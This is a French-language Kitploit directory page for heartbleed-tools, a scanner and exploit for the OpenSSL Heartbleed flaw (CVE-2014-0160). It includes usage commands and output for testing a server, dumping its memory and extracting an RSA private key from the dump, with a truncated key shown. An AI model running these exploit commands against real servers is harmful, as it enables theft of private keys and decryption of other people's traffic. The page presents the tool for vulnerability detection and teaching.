Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
heartbleed-tools — Scanner de vulnérabilité OpenSSL Heartbleed (CVE-2014-0160), extracteur de données et outils de restauration de clés RSA. | Kitploit
Outils/GitHubGitHub/einaros/heartbleed-tools
Scanners de VulnérabilitésExploitationCollecte d'InformationsCryptographieTests d'IntrusionApprentissage et Éducation
GitHubeinaros/heartbleed-tools

heartbleed-tools

Scanner de vulnérabilité OpenSSL Heartbleed (CVE-2014-0160), extracteur de données et outils de restauration de clés RSA.

Voir le dépôt
982150il y a 12 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Scanner de vulnérabilité OpenSSL Heartbleed (CVE-2014-0160), extracteur de données et outil de récupération de clés RSA.

Auteur : Einar Otto Stangvik / @einaros / https://hacking.ventures

Le chat étant sorti du sac depuis longtemps et d'autres ayant commencé à publier leurs outils, je publie également les miens. Espérons que cela amplifie la pression sur ceux qui n'ont toujours pas corrigé ou mis à niveau leurs serveurs. D'autres pourront trouver ces outils intéressants d'un point de vue pédagogique.

Contrairement à de nombreux autres PoC Heartbleed, cet outil fournit la plupart des chiffrements possibles dans le paquet ClientHello initial. Quel que soit le chiffrement choisi par le serveur, il sera utilisé pour tous les paquets ClientHello suivants lors d'une session de collecte. Cela devrait garantir une détection correcte de la vulnérabilité, tout en réduisant la surcharge une fois qu'un chiffrement a été trouvé.

Utilisez ces outils comme bon vous semble, mais rendez-nous service à tous : Résolvez des problèmes plutôt que d'en créer.

Inspiré par les travaux et publications de :

  • Jared Stafford
  • Jeremi M Gosney
  • Ben M Murphy
  • ... et bien d'autres.

Utilisation :

On voit ici la récupération de l'un des nombres premiers RSA du défi CloudFlare 34 fois en une minute. Cela équivaut à obtenir la clé privée complète 34 fois en une minute. img

root@kitploit:~
# Test de vulnérabilité en mode discret
# Cela demandera N octets, mais en fournira N-1, de sorte que le serveur
# ne laissera réellement fuir qu'un seul octet s'il est vulnérable. Le N suggéré est 16360 dans ce
# cas, car cela produira un seul enregistrement TLS :
# 3 + 2 + 1 + 2 + 16360 + 16 octets = 0xFFFF.

$ ./hb.py -u -n 16360 -p 443 www.example.int
www.example.int:443 is vulnerable

# Collecte de données depuis l'ancien serveur de défi CloudFlare

$ ./hb.py -p 443 www.cloudflarechallenge.com -n 0xF000 -l 100 -t 50 -d -o cloudflare-dump.bin
[2014/04/14 10:55:48] Incoming data rate: 85877 kbps
... s'exécute pendant un moment

# Recherche du nombre premier dans la collecte

$ ./keyscan.py cloudflare.crt cloudflare-dump.bin
Key size: 128
Data length: 173476834
cloudflare-dump.bin Offset 0xf155ec: p = 13827796798740740191625032142481917804987720337701...

# Extraction de la clé une fois trouvée

$ ./keyscan.py cloudflare.crt cloudflare-dump.bin 0xf155ec
Prime should be at offset: f155ec
Key size: 128

Hexdump of surrounding data:
f151ec: D0 00 00 00 00 00 00 00 00 00 00 00 00 00 30 C0  ..............0.
f151fc: 3C 01 00 00 00 00 00 00 00 00 00 00 00 00 90 8B  <...............
f1520c: D0 00 00 00 00 00 02 00 C3 A3 4D 08 48 47 00 00  ..........M.HG..
...

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAm0AWkVnDx5feOctdC97Ztgvtd25uKKmhjCHpLycmExe1RiRSl/hGIL7f8Fg/
qiUztVm5uXZJ1UG7dzz+9OtTNh+v27BtzPsU3yivHevwAB1mTMtP6bPuXBjzsxRcC9yVcBBWpKBM
...

Licence

L'auteur ne peut et ne veut détenir aucun droit sur aucune partie de ce paquet. Il est basé sur des idées ouvertes, et restera ouvert pour tout ce qu'il lui importe.

Télécharger l’outil